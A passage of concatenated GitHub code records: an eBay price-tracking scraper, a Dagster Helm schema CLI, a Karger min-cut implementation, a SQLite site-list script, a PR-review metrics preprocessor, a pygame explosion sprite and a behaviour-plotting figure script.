\"m.ebay-kleinanzeigen\" in url:\n print(\"Mobile version detected!\")\n r = requests.get(url, headers=self.headers, proxies=self.proxies)\n doc = BeautifulSoup(r.text.replace(\"​\", \"\"), \"html.parser\")\n url = urljoin(\n self.base_url_ebay_kleinanzeigen,\n doc.find(id=\"footer-webversion-link\").get(\"href\"),\n )\n\n return url\n\n def uri_validator(self, x):\n \"\"\"\n Validiert ein URL\n \"\"\"\n try:\n result = urlparse(x)\n return all([result.scheme, result.netloc, result.path])\n except:\n return False\n\n def set_max_articles(self, max_articles):\n \"\"\"\n Setzt die maximal zu crawlenden Artikel.\n \"\"\"\n self.max_articles = max_articles if max_articles > 0 else 1000\n\n def fetch_url(self, url):\n \"\"\"\n Holt eine URL mittels requests und liefert das Response-Objekt zurück.\n \"\"\"\n try:\n # print('...fetching with headers',url)\n r = requests.get(url, headers=self.headers, proxies=self.proxies)\n r.raise_for_status()\n return r\n except:\n # print('fetch_url>except!', url)\n print(r.status_code)\n\n return r\n\n def fetch(self):\n \"\"\"\n .fetch crawled jede URL.\n Keine Parameter. Bei Erfolg True, bei einem Fehler False.\n \"\"\"\n if len(self.search_items) == 0:\n return False\n\n result = []\n for search_item in self.search_items:\n # https://www.ebay-kleinanzeigen.de/s-boote-bootszubehoer/detmold/jolle/k0c211l1792r30\n\n if \"ebay-kleinanzeigen.de\" in search_item.url:\n result.append(self.fetch_page_ebay_kleinanzeigen(search_item))\n elif \"ebay.de\" in search_item.url:\n result.append(self.fetch_page_ebay_de(search_item))\n else:\n print(\"Link unbekannt! -> \", search_item.url)\n # Momentan noch nicht implementiert!\n # elif search_item.site == 'ebay.de':\n # result.append(self.fetch_page_ebay_de(search_item))\n # print(result)\n for res in result:\n if res == False:\n return False\n return True\n\n def fetch_page_ebay_kleinanzeigen(self, search_item):\n \"\"\"Hole die Artikel der Seite.\n Übergabe von zu holender URL + aktuelle Anzahl der Artikel.\n Weitere Seiten werden über Rekursion bearbeitet.\n\n Rückgabe: Alle Artikelpreise als list, Anzahl der bearbeiteten Artikel\n \"\"\"\n keywords = self.keywords\n\n # Artikel holen\n article = self.fetch_url(search_item.url)\n if article == False:\n return False\n\n doc = BeautifulSoup(article.text.replace(\"​\", \"\"), \"html.parser\")\n doc_search_query = doc.find(id=\"site-search-query\")\n\n # Falls der Titel 'Security Violation', mit False zurück\n if article.status_code == 503:\n search_item.error = doc.select_one(\"title\").text.strip()\n print(\"Error-Code: \", article.status_code)\n # print(doc)\n return False\n if doc.select_one(\"title\").text.strip() == \"Security Violation (503)\":\n print(\"Security Violation (503)\")\n # print(doc)\n search_item.error = doc.select_one(\"title\").text.strip()\n return False\n elif doc_search_query is None:\n print(\"None\")\n # print(doc)\n search_item.error = \"None\"\n return False\n\n # Suchstring speichern\n search_item.search_query = doc_search_query.get(\"value\")\n\n all_prices = []\n for element in doc.select(\".aditem\"):\n # Link auf Artikel\n # link = element.select_one('.ellipsis').get('href')\n\n # Titel holen\n title = element.select_one(\".ellipsis\").text.strip().lower()\n # Titel nach Keywords ausschließen\n if [title for keyword in keywords if (keyword in title)]:\n # print('Keyword!Title')\n search_item.quantity_ignored += 1\n continue\n # Anreisser-Description nach Keywords ausschließen\n descr = element.select_one(\".aditem-main p\").text.strip().lower()\n if [descr for keyword in keywords if (keyword in descr)]:\n # print('Keyword!Descr')\n search_item.quantity_ignored += 1\n continue\n\n # Preis holen\n price = element.select_one(\".aditem-details\").strong.text.strip()\n \n # Preis säubern\n price = self.clean_price( price)\n if price == False:\n search_item.quantity_ignored += 1\n continue\n \n # print(\" # \", title, price)\n search_item.quantity += 1\n all_prices.append(price)\n\n # Nächste Seite aufrufen\n next_page = doc.select_one(\".pagination-next\")\n # print(next_page)\n # Wenn Link auf nächste Seite und Anzahl der Anzeigen nicht über self.max_articles...\n if next_page and search_item.quantity < self.max_articles:\n search_item.url_next_page = urljoin(\n self.base_url_ebay_kleinanzeigen, next_page.get(\"href\")\n )\n # print(url_next_page)\n time.sleep(0.4)\n print(\"next page!\", search_item.quantity)\n self.fetch_page_ebay_kleinanzeigen(search_item)\n\n if doc_search_query.get(\"value\") in search_item.all_prices:\n print(\"alle_preise: url schon vorhanden!\", doc_search_query.get(\"value\"))\n search_item.all_prices.extend(all_prices)\n else:\n print(\n \"alle_preise: url noch nicht vorhanden!\", doc_search_query.get(\"value\")\n )\n search_item.all_prices = all_prices\n search_item.searched = True\n self.searched = True\n return True\n\n def fetch_page_ebay_de(self, search_item):\n \"\"\"Hole die Artikel der Seite.\n Übergabe von zu holender URL + aktuelle Anzahl der Artikel.\n Weitere Seiten werden über Rekursion bearbeitet.\n\n Rückgabe: Alle Artikelpreise als list, Anzahl der bearbeiteten Artikel\n \"\"\"\n keywords = self.keywords\n # Artikel holen\n article = self.fetch_url(search_item.url)\n if article == False:\n return False\n\n doc = BeautifulSoup(article.text.replace(\"​\", \"\"), \"html.parser\")\n doc_search_query = doc.find(id=\"gh-ac\")\n\n # Falls der Titel 'Security Violation', mit False zurück\n if article.status_code == 503:\n search_item.error = doc.select_one(\"title\").text.strip()\n print(\"Error-Code: \", article.status_code)\n # print(doc)\n return False\n if doc.select_one(\"title\").text.strip() == \"Security Violation (503)\":\n print(\"Security Violation (503)\")\n # print(doc)\n search_item.error = doc.select_one(\"title\").text.strip()\n return False\n elif doc_search_query is None:\n print(\"None\")\n # print(doc)\n search_item.error = \"None\"\n return False\n\n # Suchstring speichern\n search_item.search_query = doc_search_query.get(\"value\")\n\n all_prices = []\n for element in doc.select(\".sresult\"):\n # Link auf Artikel\n # link = element.select_one('.ellipsis').get('href')\n\n # Titel holen\n title = (\n element.select_one(\".lvtitle\")\n .text.replace(\"Neues Angebot\", \"\")\n .strip()\n .lower()\n )\n # Titel nach Keywords ausschließen\n if [title for keyword in keywords if (keyword in title)]:\n # print('Keyword!Title')\n search_item.quantity_ignored += 1\n continue\n\n # Preis holen\n price = element.select_one(\".lvprice\").text.strip()\n \n # Preis säubern\n price = self.clean_price( price)\n if price == False:\n search_item.quantity_ignored += 1\n continue\n\n # print(' # ', title, price)\n search_item.quantity += 1\n all_prices.append(price)\n # print(title,': ', price)\n\n # Nächste Seite aufrufen\n next_page = doc.select_one(\".pagn-next .gspr\")\n # print(next_page)\n # Wenn Link auf nächste Seite und Anzahl der Anzeigen nicht über self.max_articles...\n if next_page and search_item.quantity < self.max_articles:\n search_item.url_next_page = urljoin(\n self.base_url_ebay_de, next_page.get(\"href\")\n )\n # print(url_next_page)\n time.sleep(0.4)\n print(\"next page!\", search_item.quantity)\n self.fetch_page_ebay_kleinanzeigen(search_item)\n\n if doc_search_query.get(\"value\") in search_item.all_prices:\n print(\"alle_preise: url schon vorhanden!\", doc_search_query.get(\"value\"))\n search_item.all_prices.extend(all_prices)\n else:\n print(\n \"alle_preise: url noch nicht vorhanden!\", doc_search_query.get(\"value\")\n )\n search_item.all_prices = all_prices\n search_item.searched = True\n self.searched = True\n return True\n\n def clean_price( self, price):\n '''\n Original Preis übergeben und verschiedene Optionen filtern. False wird zurückgegeben, wenn der Preis nicht eindeutig ist.\n '''\n cleaning_strings_cut = ('UVP','(','Bisher')\n\n\n if price == \"VB\" or price.strip() == \"\" or \"bis\" in price or \"Zu verschenken\" in price:\n return False\n\n for string_cut in cleaning_strings_cut:\n if string_cut in price:\n price = price[:price.index(string_cut)].strip()\n \n try:\n if '.' in price:\n price = price.replace('.','')\n \n price = float(\n price.replace(\" €\", \"\")\n .replace(\"EUR\", \"\")\n .replace(',','.')\n .replace(\" VB\", \"\")\n .strip()\n )\n except:\n return False\n return price\n\n def get_error(self):\n \"\"\"\n Liefert alle bisherigen Fehler zurück\n \"\"\"\n error = \"\"\n for search_item in self.search_items:\n if not search_item.error == \"\":\n error += Markup(search_item.url + \": \" + search_item.error)\n return error\n\n def get_search_querys(self):\n \"\"\"\n Liefert zur Anzeige die Suchbegriffe.\n \"\"\"\n if len(self.search_items) > 1:\n search_querys_text = \"\"\n for search_item in self.search_items:\n if not search_querys_text == \"\":\n search_querys_text += \" - \"\n search_querys_text += search_item.search_query\n else:\n search_querys_text = self.search_items[0].search_query\n return search_querys_text\n\n def get_plot(self):\n \"\"\"\n Generiert den Boxplot für die URLs.\n Rückgabe ist ein png.\n \"\"\"\n import io\n import base64\n import matplotlib\n from matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas\n\n matplotlib.use(\"agg\")\n fig, axs = plt.subplots()\n\n all_prices_list = []\n labels_list = []\n for search_item in self.search_items:\n all_prices_list.append(search_item.all_prices)\n labels_list.append(search_item.search_query)\n\n axs.boxplot(all_prices_list, labels=labels_list)\n\n # Convert plot to PNG image\n pngImage = io.BytesIO()\n FigureCanvas(fig).print_png(pngImage)\n\n # Encode PNG image to base64 string\n pngImageB64String = \"data:image/png;base64,\"\n pngImageB64String += base64.b64encode(pngImage.getvalue()).decode(\"utf8\")\n\n return pngImageB64String\n","repo_name":"jkopka/price_tracker","sub_path":"app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":14869,"program_lang":"python","lang":"de","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"9882071357","text":"import os\nimport subprocess\n\nimport click\n\nfrom .charts.dagster.values import DagsterHelmValues\nfrom .charts.dagster_user_deployments.values import DagsterUserDeploymentsHelmValues\n\n\ndef git_repo_root():\n return subprocess.check_output([\"git\", \"rev-parse\", \"--show-toplevel\"]).decode(\"utf-8\").strip()\n\n\nCLI_HELP = \"\"\"Tools to help generate the schema file for the Dagster Helm chart.\n\"\"\"\n\n\n@click.group(help=CLI_HELP)\ndef cli():\n pass\n\n\n@cli.group()\ndef schema():\n \"\"\"Generates the `values.schema.json` file according to user specified pydantic models.\"\"\"\n\n\n@schema.command()\ndef show():\n \"\"\"Displays the json schema on the console.\"\"\"\n click.echo(\"--- Dagster Helm Values ---\")\n click.echo(DagsterHelmValues.schema_json(indent=4))\n\n click.echo(\"\\n\\n\")\n click.echo(\"--- Dagster User Deployment Helm Values ---\")\n click.echo(DagsterUserDeploymentsHelmValues.schema_json(indent=4))\n\n\n@schema.command()\ndef apply():\n \"\"\"Saves the json schema in the Helm `values.schema.json`.\"\"\"\n helm_values_path_tuples = {\n (DagsterHelmValues, os.path.join(git_repo_root(), \"helm\", \"dagster\", \"values.schema.json\")),\n (\n DagsterUserDeploymentsHelmValues,\n os.path.join(\n git_repo_root(),\n \"helm\",\n \"dagster\",\n \"charts\",\n \"dagster-user-deployments\",\n \"values.schema.json\",\n ),\n ),\n }\n\n for helm_values, path in helm_values_path_tuples:\n with open(path, \"w\", encoding=\"utf8\") as f:\n f.write(helm_values.schema_json(indent=4))\n f.write(\"\\n\")\n\n\ndef main():\n click_cli = click.CommandCollection(sources=[cli], help=CLI_HELP)\n click_cli()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"dagster-io/dagster","sub_path":"helm/dagster/schema/schema/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1773,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"17871037838","text":"from random import randint\n\n\nclass KargerMinCutter:\n def __init__(self, graph_file):\n self._graph = {}\n self._total_edges = 0\n with open(graph_file) as file:\n for index, line in enumerate(file):\n numbers = [int(number) for number in line.split()]\n self._graph[numbers[0]] = numbers[1:]\n self._total_edges += len(numbers[1:])\n\n def find_min_cut(self):\n min_cut = 0\n while len(self._graph) > 2:\n v1, v2 = self._pick_random_edge()\n self._total_edges -= len(self._graph[v1])\n self._total_edges -= len(self._graph[v2])\n self._graph[v1].extend(self._graph[v2])\n for vertex in self._graph[v2]:\n self._graph[vertex].remove(v2)\n self._graph[vertex].append(v1)\n self._graph[v1] = list(filter(lambda v: v != v1, self._graph[v1]))\n self._total_edges += len(self._graph[v1])\n self._graph.pop(v2)\n for edges in self._graph.values():\n min_cut = len(edges)\n return min_cut\n\n def _pick_random_edge(self):\n rand_edge = randint(0, self._total_edges - 1)\n for vertex, vertex_edges in self._graph.items():\n if len(vertex_edges) <= rand_edge:\n rand_edge -= len(vertex_edges)\n else:\n from_vertex = vertex\n to_vertex = vertex_edges[rand_edge]\n return from_vertex, to_vertex\n\nif __name__ == \"__main__\":\n min_cut = 99999\n for i in range(40000):\n min_cutter = KargerMinCutter('assignment3.txt')\n cut = min_cutter.find_min_cut()\n if cut < min_cut:\n min_cut = cut\n print(min_cut)","repo_name":"mikemyl/algorithms-stanford","sub_path":"part_1/assignment3_karger_min_cut/app/min_cutter.py","file_name":"min_cutter.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"53"} +{"seq_id":"13199788279","text":"import sqlite3\n\n\nsite_list = [\n'reddit.com',\n'news.ycombinator.com',\n'feedly.com',\n'youtube.com',\n'test.com',\n'test2.com',\n]\n\ncon = sqlite3.connect(\"places.sqlite\") # first create an empty file to save the db\ncur = con.cursor()\ncur.execute(\"CREATE TABLE IF NOT EXISTS procrastinate ('procrastinate' text);\")\ncur.execute(\"DELETE FROM procrastinate;\")\n\nfor i in site_list:\n cur.execute(\"INSERT INTO procrastinate ('procrastinate') VALUES (?);\", (i,))\n\ncon.commit()\ncon.close()","repo_name":"mattarderne/firefox_explore","sub_path":"procrastinate.py","file_name":"procrastinate.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"53"} +{"seq_id":"26374157393","text":"import logging\n\nimport numpy as np\n\nfrom typing import Tuple, Dict, Any, List, Union\nfrom pathlib import Path\nfrom datetime import timedelta\nfrom datetime import datetime\n\nfrom srcopsmetrics.create_bot_knowledge import load_previous_knowledge\nfrom srcopsmetrics.utils import convert_num2label, convert_score2num\n\n\n_LOGGER = logging.getLogger(__name__)\n\n\ndef retrieve_knowledge(knowledge_path: Path, project: str) -> Union[Dict[str, Any], None]:\n \"\"\"Retrieve knowledge (PRs) collected for a project.\"\"\"\n project_knowledge_path = knowledge_path.joinpath(\"./\" + f\"{project}\")\n pull_requests_data_path = project_knowledge_path.joinpath(\"./pull_requests.json\")\n\n data = load_previous_knowledge(project, pull_requests_data_path, \"PullRequest\")\n if data:\n return data\n else:\n _LOGGER.exception(\"No previous knowledge found for %s\" % project)\n return {}\n\n\ndef analyze_pr_for_project_data(pr_id: int, pr: Dict[str, Any], extracted_data: Dict[str, Any]):\n \"\"\"Extract project data from Pull Request.\"\"\"\n if not pr[\"reviews\"]:\n return extracted_data\n\n # Consider all approved reviews\n pr_approved_dt = [\n datetime.fromtimestamp(review[\"submitted_at\"])\n for review in pr[\"reviews\"].values()\n if review[\"state\"] == \"APPROVED\"\n ]\n\n if not pr_approved_dt:\n return extracted_data\n\n extracted_data[\"ids\"].append(pr_id)\n\n # PR created timestamp\n pr_created_dt = datetime.fromtimestamp(pr[\"created_at\"])\n extracted_data[\"created_dts\"].append(pr_created_dt)\n\n # PR first review timestamp (no matter the contributor)\n pr_first_review_dt = datetime.fromtimestamp([r for r in pr[\"reviews\"].values()][0][\"submitted_at\"])\n\n ttfr = (pr_first_review_dt - pr_created_dt).total_seconds() / 3600\n extracted_data[\"TTFR\"].append(ttfr)\n\n mttfr = np.median(extracted_data[\"TTFR\"])\n extracted_data[\"MTTFR\"].append(mttfr)\n\n project_prs_size = pr[\"size\"]\n extracted_data[\"PRs_size\"].append(project_prs_size)\n extracted_data[\"encoded_PRs_size\"].append(convert_score2num(label=project_prs_size))\n\n # Take maximum to consider last approved if more than one contributor has to approve\n pr_approved_dt = max(pr_approved_dt)\n\n ttr = (pr_approved_dt - pr_created_dt).total_seconds() / 3600\n extracted_data[\"TTR\"].append(ttr)\n\n mttr = np.median(extracted_data[\"TTR\"])\n extracted_data[\"MTTR\"].append(mttr)\n\n # PR reviews timestamps\n extracted_data[\"reviews_dts\"] += [r[\"submitted_at\"] for r in pr[\"reviews\"].values()]\n\n return extracted_data\n\n\ndef pre_process_project_data(data: Dict[str, Any]):\n \"\"\"Pre process of data for a given project repository.\"\"\"\n if not data:\n return {}\n pr_ids = sorted([int(k) for k in data.keys()])\n\n project_reviews_data = {}\n\n project_reviews_data[\"contributors\"] = []\n project_reviews_data[\"ids\"] = []\n project_reviews_data[\"created_dts\"] = []\n project_reviews_data[\"reviews_dts\"] = []\n\n project_reviews_data[\"TTFR\"] = [] # Time to First Review (TTFR) [hr]\n project_reviews_data[\"MTTFR\"] = [] # Median TTFR [hr]\n\n project_reviews_data[\"TTR\"] = [] # Time to Review (TTR) [hr]\n project_reviews_data[\"MTTR\"] = [] # Median TTR [hr]\n\n project_reviews_data[\"PRs_size\"] = [] # Pull Request length\n project_reviews_data[\"encoded_PRs_size\"] = [] # Pull Request length encoded\n\n for pr_id in pr_ids:\n pr = data[str(pr_id)]\n\n if pr[\"created_by\"] not in project_reviews_data[\"contributors\"]:\n project_reviews_data[\"contributors\"].append(pr[\"created_by\"])\n\n analyze_pr_for_project_data(pr_id=pr_id, pr=pr, extracted_data=project_reviews_data)\n\n project_reviews_data[\"last_review_time\"] = max(project_reviews_data[\"reviews_dts\"])\n\n # Encode Pull Request sizes for the contributor\n project_pr_median_size, project_length_score = convert_num2label(\n score=np.median(project_reviews_data[\"encoded_PRs_size\"])\n )\n project_reviews_data[\"median_pr_length\"] = project_pr_median_size\n project_reviews_data[\"median_pr_length_score\"] = project_length_score\n\n return project_reviews_data\n\n\ndef evaluate_reviewer_data(\n pr: Dict[str, Any],\n reviewer: str,\n review_submission_dt: datetime.timestamp,\n extracted_data: Dict[str, Any]\n):\n \"\"\"Evaluate reviewer data from reviews.\"\"\"\n if not pr[\"reviews\"]:\n return extracted_data\n\n dt_approved = [\n datetime.fromtimestamp(review[\"submitted_at\"])\n for review in pr[\"reviews\"].values()\n if review[\"state\"] == \"APPROVED\" and review[\"author\"] == reviewer\n ]\n\n if not dt_approved:\n return extracted_data\n\n # PR created timestamp\n pr_created_dt = datetime.fromtimestamp(pr[\"created_at\"])\n extracted_data[\"created_dts\"].append(pr_created_dt)\n\n pr_first_review_dt = datetime.fromtimestamp(review_submission_dt[0])\n ttfr = (pr_first_review_dt - pr_created_dt).total_seconds() / 3600\n extracted_data[reviewer][\"TTFR\"] = ttfr\n\n mttfr = np.median(extracted_data[reviewer][\"TTFR\"])\n extracted_data[reviewer][\"MTTFR\"].append(mttfr)\n\n project_prs_size = pr[\"size\"]\n extracted_data[reviewer][\"PRs_size\"].append(project_prs_size)\n extracted_data[reviewer][\"encoded_PRs_size\"].append(convert_score2num(label=project_prs_size))\n\n # Take maximum to consider last approved if more than one contributor has to approve\n pr_approved_dt = max(dt_approved)\n\n ttr = (pr_approved_dt - pr_created_dt).total_seconds() / 3600\n extracted_data[reviewer][\"TTR\"].append(ttr)\n\n mttr = np.median(extracted_data[reviewer][\"TTR\"])\n extracted_data[reviewer][\"MTTR\"].append(mttr)\n\n\ndef extract_review_data(\n pr_id: int,\n pr_author: str,\n contributor_review: Dict[str, Any],\n extracted_data: Dict[str, Any],\n reviews_submitted_dts_per_reviewer: Dict[str, Any]\n):\n \"\"\"Extract contributor data from Pull Request reviews.\"\"\"\n # Check reviews and discard comment of the author of the PR\n if contributor_review[\"author\"] == pr_author:\n return extracted_data\n\n if contributor_review[\"author\"] not in extracted_data[\"reviewers\"]:\n extracted_data[\"reviewers\"].append(contributor_review[\"author\"])\n extracted_data[contributor_review[\"author\"]] = {}\n extracted_data[contributor_review[\"author\"]][\"reviews\"] = {}\n extracted_data[contributor_review[\"author\"]][\"ids\"] = []\n extracted_data[contributor_review[\"author\"]][\"TTFR\"] = [] # Time to First Review (TTFR) [hr]\n extracted_data[contributor_review[\"author\"]][\"MTTFR\"] = [] # Median TTFR [hr]\n extracted_data[contributor_review[\"author\"]][\"TTR\"] = [] # Time to Review (TTR) [hr]\n extracted_data[contributor_review[\"author\"]][\"MTTR\"] = [] # Median TTR [hr]\n extracted_data[contributor_review[\"author\"]][\"PRs_size\"] = [] # Pull Request length\n extracted_data[contributor_review[\"author\"]][\"encoded_PRs_size\"] = [] # Pull Request length encoded\n\n if pr_id not in extracted_data[contributor_review[\"author\"]][\"reviews\"].keys():\n extracted_data[contributor_review[\"author\"]][\"reviews\"][pr_id] = [\n {\n \"words_count\": contributor_review[\"words_count\"],\n \"submitted_at\": contributor_review[\"submitted_at\"],\n \"state\": contributor_review[\"state\"],\n }\n ]\n else:\n extracted_data[contributor_review[\"author\"]][\"reviews\"][pr_id].append(\n {\n \"words_count\": contributor_review[\"words_count\"],\n \"submitted_at\": contributor_review[\"submitted_at\"],\n \"state\": contributor_review[\"state\"],\n }\n )\n\n if contributor_review[\"author\"] not in reviews_submitted_dts_per_reviewer.keys():\n reviews_submitted_dts_per_reviewer[contributor_review[\"author\"]] = [contributor_review[\"submitted_at\"]]\n else:\n reviews_submitted_dts_per_reviewer[contributor_review[\"author\"]].append(contributor_review[\"submitted_at\"])\n\n return extracted_data\n\n\ndef analyze_pr_for_contributor_data(pr_id: int, pr: Dict[str, Any], extracted_data: Dict[str, Any]):\n \"\"\"Extract project data from Pull Request.\"\"\"\n if not pr[\"reviews\"]:\n return extracted_data\n\n pr_author = pr[\"created_by\"]\n\n reviews_submitted_dts_per_reviewer = {}\n\n for review in pr[\"reviews\"].values():\n extract_review_data(\n pr_id=pr_id,\n pr_author=pr_author,\n contributor_review=review,\n extracted_data=extracted_data,\n reviews_submitted_dts_per_reviewer=reviews_submitted_dts_per_reviewer\n )\n\n for reviewer, review_submission_dt in reviews_submitted_dts_per_reviewer.items():\n\n evaluate_reviewer_data(\n pr=pr,\n reviewer=reviewer,\n review_submission_dt=review_submission_dt,\n extracted_data=extracted_data,\n )\n\n\ndef analyze_contributors_interaction(\n pr_interactions: Dict[str, int],\n pr_author: str,\n interactions_data: Dict[str, Dict[str, int]]\n):\n \"\"\"Analyze project contributors interactions.\"\"\"\n if not pr_interactions:\n return interactions_data\n\n for contributor, interaction_info in pr_interactions.items():\n if contributor != pr_author:\n # Check if it is a bot.\n if contributor not in interactions_data[pr_author].keys():\n pass\n else:\n interactions_data[pr_author][contributor] += interaction_info\n\n return interactions_data\n\n\ndef pre_process_contributors_data(data: Dict[str, Any], contributors: List[str]):\n \"\"\"Pre process of data for contributors in a project repository.\"\"\"\n pr_ids = sorted([int(k) for k in data.keys()])\n\n contributors_reviews_data = {}\n contributors_reviews_data[\"reviewers\"] = []\n contributors_reviews_data[\"created_dts\"] = []\n\n interactions = {}\n for contributor in contributors:\n contributor_interaction = dict.fromkeys(contributors, 0)\n interactions[contributor] = contributor_interaction\n\n for pr_id in pr_ids:\n pr = data[str(pr_id)]\n\n analyze_pr_for_contributor_data(pr_id=pr_id, pr=pr, extracted_data=contributors_reviews_data)\n\n analyze_contributors_interaction(\n pr_interactions=pr[\"interactions\"],\n pr_author=pr[\"created_by\"],\n interactions_data=interactions)\n\n for reviewer in contributors_reviews_data[\"reviewers\"]:\n\n number_reviews = 0\n reviews_length = []\n time_reviews = []\n\n for reviews in contributors_reviews_data[reviewer][\"reviews\"].values():\n number_reviews += len(reviews)\n review_words = 0\n for review in reviews:\n review_words += review[\"words_count\"]\n time_reviews.append(review[\"submitted_at\"])\n\n reviews_length.append(review_words)\n\n last_review_dt = max(time_reviews)\n\n contributors_reviews_data[reviewer][\"number_reviews\"] = number_reviews\n contributors_reviews_data[reviewer][\"median_review_length\"] = np.median(reviews_length)\n contributors_reviews_data[reviewer][\"last_review_time\"] = last_review_dt\n\n # Encode Pull Request sizes for the contributor\n if len(contributors_reviews_data[reviewer][\"PRs_size\"]) > 1:\n contributor_prs_size_encoded = [\n convert_score2num(label=pr_size) for pr_size in contributors_reviews_data[reviewer][\"PRs_size\"]\n ]\n else:\n contributor_prs_size_encoded = convert_score2num(label=contributors_reviews_data[reviewer][\"PRs_size\"])\n\n contributor_pr_median_size, contributor_relative_score = convert_num2label(\n score=np.median(contributor_prs_size_encoded)\n )\n contributors_reviews_data[reviewer][\"median_pr_length\"] = contributor_pr_median_size\n contributors_reviews_data[reviewer][\"median_pr_length_score\"] = contributor_relative_score\n contributors_reviews_data[reviewer][\"interactions\"] = interactions[reviewer]\n\n return contributors_reviews_data\n","repo_name":"saisankargochhayat/kebechet_sample","sub_path":"srcopsmetrics/pre_processing.py","file_name":"pre_processing.py","file_ext":"py","file_size_in_byte":12056,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38768959266","text":"import pygame\nimport os\nimport uuid\n\nclass Explosion(pygame.sprite.Sprite):\n\tdef __init__(self, x, y):\n\t\tpygame.sprite.Sprite.__init__(self)\n\t\tself.uuid = str(uuid.uuid4())\n\t\tself.images = []\n\t\tfor num in range(1, 6):\n\t\t\timg = pygame.image.load(os.path.join(\"assets/explosions/\", \"exp\"+str(num)+\".png\"))\n\t\t\timg = pygame.transform.scale(img, (100, 100))\n\t\t\tself.images.append(img)\n\t\tself.index = 0\n\t\tself.image = self.images[self.index]\n\t\tself.rect = self.image.get_rect()\n\t\tself.rect.center = [x, y]\n\t\tself.counter = 0\n\n\tdef update(self):\n\t\texplosion_speed = 4\n\t\t#update explosion animation\n\t\tself.counter += 1\n\n\t\tif self.counter >= explosion_speed and self.index < len(self.images) - 1:\n\t\t\tself.counter = 0\n\t\t\tself.index += 1\n\t\t\tself.image = self.images[self.index]\n\n\t\t#if the animation is complete, reset animation index\n\t\tif self.index >= len(self.images) - 1 and self.counter >= explosion_speed:\n\t\t\tself.kill()\n\t\n\tdef to_dict(self):\n\t\treturn {\n\t\t\t\"uuid\": self.uuid,\n\t\t\t\"x\": self.rect.x,\n\t\t\t\"y\": self.rect.y\n\t\t}\n\t\n\tdef from_dict(self, data):\n\t\tself.uuid = data[\"uuid\"]\n\t\tself.rect.x = data[\"x\"]\n\t\tself.rect.y = data[\"y\"]","repo_name":"Tran-Hugo/SpaceWar","sub_path":"entities/Explosion.py","file_name":"Explosion.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38273934645","text":"import os\n\nimport figparams\nimport matplotlib.colors\nimport matplotlib.gridspec as gridspec\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport studyparams\nfrom jaratoolbox import extraplots\nfrom jaratoolbox import settings\n\nFIGNAME = 'figure_characterise_behaviour'\ndataDir = os.path.join(settings.FIGURES_DATA_PATH, studyparams.STUDY_NAME, FIGNAME)\n# dataDir = os.path.join(settings.FIGURES_DATA_PATH, FIGNAME)\n\nPANELS = [1, 1, 1] # Plot panel i if PANELS[i]==1\n\nSAVE_FIGURE = 1\noutputDir = '/tmp/'\nfigFilename = 'FigX_behaviour_characterisation_by_strain' # Do not include extension\nfigFormat = 'pdf' # 'pdf' or 'svg'\n# figFormat = 'svg'\nfigSize = [8,4] # In inches\n\nfontSizeLabels = figparams.fontSizeLabels\nfontSizeTicks = figparams.fontSizeTicks\nfontSizePanel = figparams.fontSizePanel\nfontSizeLegend = figparams.fontSizeLegend\n\nlabelPosX = [0.005, 0.36, 0.66, 0.42] # Horiz position for panel labels\nlabelPosY = [0.98, 0.78, 0.48, 0.28] # Vert position for panel labels\n\nfileName = 'unimplanted_behaviour.npz'\n\nwtColour = figparams.colp['excitatoryCell']\nPVColour = figparams.colp['PVcell']\nSOMColour = figparams.colp['SOMcell']\nPVCHR2Colour = figparams.colp['sound']\n\nfig = plt.gcf()\nfig.clf()\nfig.set_facecolor('w')\n\ngs = gridspec.GridSpec(2,3, width_ratios=[1, 1, 1.4])\ngs.update(top=0.94, bottom=0.10, left=0.07, right=0.98, wspace=0.3, hspace=0.5)\n\n# --- individual psychometric curve ---\nif PANELS[0]:\n dataFullPath = os.path.join(dataDir, fileName)\n data = np.load(dataFullPath)\n\n PVCHR2psyCurves = data['PVCHR2toneDetect']\n PVARCHTpsyCurves = data['PVARCHTtoneDetect']\n SOMARCHTpsyCurves = data['SOMARCHTtoneDetect']\n wtPsyCurves = data['wtToneDetect']\n\n possibleSNRs = data['possibleSNRs']\n\n psyCurves = [wtPsyCurves, PVCHR2psyCurves, PVARCHTpsyCurves, SOMARCHTpsyCurves]\n curveColours = [wtColour, PVCHR2Colour, PVColour, SOMColour]\n curveLabels = ['wild-type', 'PV::ChR2', 'PV::ArchT', 'SOM::ArchT']\n\n for indType, curves in enumerate(psyCurves):\n axCurves = plt.subplot(gs[indType//2,indType%2])\n\n for indCurve in range(curves.shape[0]):\n plt.plot(range(len(possibleSNRs)), curves[indCurve,:], '-', color=curveColours[indType], alpha=0.3, zorder=0)\n\n plt.plot(range(len(possibleSNRs)), np.median(curves, axis=0), 'o-', color=curveColours[indType], lw=3, zorder=10)\n #plt.plot(range(len(possibleSNRs)), np.mean(curves, axis=0), 'o-', color=curveColours[indType], lw=3, zorder=10)\n\n axCurves.set_xlim(-0.2, len(possibleSNRs)-0.8)\n axCurves.set_xticks(range(len(possibleSNRs)))\n axCurves.set_xticklabels(possibleSNRs)\n if indType//2:\n axCurves.set_xlabel('SNR (dB)')\n\n axCurves.set_ylim(0, 100)\n if indType%2==0:\n axCurves.set_ylabel('% tone reported')\n\n axCurves.set_title(curveLabels[indType])\n\n extraplots.boxoff(axCurves)\n\n# -- summaries of accuracy by bandwidth --\nif PANELS[1]:\n dataFullPath = os.path.join(dataDir, fileName)\n data = np.load(dataFullPath)\n\n PVCHR2accuracy = data['PVCHR2correctByBand']\n PVARCHTaccuracy = data['PVARCHTcorrectByBand']\n SOMARCHTaccuracy = data['SOMARCHTcorrectByBand']\n wtAccuracy = data['wtCorrectByBand']\n\n possibleBands = data['possibleBands']\n bandsToUse = [0,-1] # using first and last bands because PV-ChR2 